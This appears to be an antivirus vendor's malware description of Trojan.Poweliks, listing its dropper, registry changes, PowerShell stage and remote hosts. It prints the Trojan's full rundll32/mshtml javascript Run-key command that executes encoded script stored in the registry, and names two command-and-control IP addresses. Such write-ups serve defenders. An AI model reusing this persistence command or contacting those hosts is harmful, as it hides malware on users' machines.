Home / malware Trojan.Poweliks
First posted on 05 August 2014.
Source: SymantecAliases :
There are no other names known for Trojan.Poweliks.
Explanation :
The Trojan may be dropped by Trojan.Mdropper.
When the Trojan is executed, it creates the following registry entries: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\"(default)" = "[ENCRYPTED JAVASCRIPT]"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\"[NON-ASCII STRING]" = "rundll32.exe javascript:\"\..\mshtml,RunHTMLApplication \";document.write(\"\74script language=jscript.encode>\"+(new%20ActiveXObject(\"WScript.Shell\")).RegRead(\"HKCU\\software\\microsoft\\windows\\currentversion\\run\\\")+\"\74/script>\")"
The Trojan then checks if the compromised computer has the PowerShell or .NET frameworks. If not, it will download the installers for these frameworks from the official Microsoft website.
Next, the Trojan decrypts a PowerShell script from its encrypted JavaScript. It runs this Powershell script to execute a binary program. This program connects to the following remote locations: 178.89.159.34178.89.159.35
The Trojan may then perform the following activities:
Receive commands from the remote attackerDelete the binary programLast update 05 August 2014
